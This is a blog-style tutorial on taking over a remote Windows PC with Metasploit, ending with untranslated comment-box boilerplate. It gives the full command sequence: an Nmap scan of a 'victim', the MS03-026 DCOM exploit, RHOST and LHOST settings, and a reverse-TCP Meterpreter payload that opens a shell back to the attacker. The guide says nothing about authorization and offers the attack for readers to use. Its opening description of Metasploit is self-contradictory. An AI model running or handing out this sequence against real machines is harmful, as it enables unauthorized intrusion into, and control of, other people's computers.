Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.
SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?
REQUIREMENTS
Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
- Linux Machine (Kali Linux or BackTrack 5)
- Metasploit (Built in the mentioned Linux OS)
- Windows PC victim
STEPS TO FOLLOW
Let's move on how to perform the complete attack.
- Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
- We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
- After the initialization of msfconsole, standard checks, we will see the window like below.
- Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
- Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
- As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
- Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
- Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
- Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
- Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
- Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server. To find out all the commands to play with the victim machine, we can use the "help".
We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου